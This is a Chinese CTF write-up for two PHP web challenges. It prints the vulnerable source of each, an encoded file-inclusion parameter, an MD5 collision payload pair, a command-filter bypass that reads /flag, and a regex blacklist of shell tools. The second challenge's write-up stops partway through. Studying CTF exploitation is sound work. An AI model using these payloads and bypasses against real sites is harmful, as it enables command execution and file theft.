Writeup(赛后整理)

easy_web

img参数看起来像base64,解密再解密得出一串数，根据提示，并不是检验过的任何md5。进行hexdecode，发现文件名555.png。于是按照相反方式构造index.php的加密，进行文件包含。

"index.php".b64encode().b64encode().hexencode()

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi～ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

MD5碰撞用fastcoll，这里粘贴一个

tsctf%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A5%BE%A1Ox%C0%16%EC%3D%2A%05%29%C3%0B%EA%B2%D4%C1%D7%AAiT%BA306%7F%8EUH%BA%D9%7E%E3%CB%BC%DEA%97%C1%CB%E3H%19%D5%C9%5E%40%D4%03%7B%90%C6x%ED%92o%5B%F9l%B9%D9%F1%7F%DF%2CJ%E7%BF%C0%28%E3%E5%09%EF%C9%40%EB%10%CB%23%84%7COx%17%23%28%AB%B3%E0f%1B%60H%C6%CFkTX%AF%86%AC4w%FBI%9B%7D%F0%1A%8D%21%ED%28%EFc%97%F6%7D%E4%FC%BF%C7%82-c%A1

tsctf%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A5%BE%A1Ox%C0%16%EC%3D%2A%05%29%C3%0B%EA%B2%D4%C1%D7%2AiT%BA306%7F%8EUH%BA%D9%7E%E3%CB%BC%DEA%97%C1%CB%E3H%19%D5I_%40%D4%03%7B%90%C6x%ED%92o%5B%F9%EC%B9%D9%F1%7F%DF%2CJ%E7%BF%C0%28%E3%E5%09%EF%C9%40%EB%10%CB%23%84%7C%CFx%17%23%28%AB%B3%E0f%1B%60H%C6%CFkTX%AF%86%AC4w%FBI%9B%7Dp%1A%8D%21%ED%28%EFc%97%F6%7D%E4%FC%BFG%82-c%A1

cmd过滤了很多，一个绕过的方法是base64命令。它接收一个从stdin读取的参数并转化成base64字串。

base64 /flag
SS1TT09OezQwZTNkYTdiNjg4YzRkNWViNzdjOTFlMjRlMGRlYzljfQo=
I-SOON{40e3da7b688c4d5eb77c91e24e0dec9c}

easy_serialize_php

代码审计题，源码如下：

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
} 

根据提示，在phpinfo中找到属性：

auto_append_file    d0g3_f1ag.php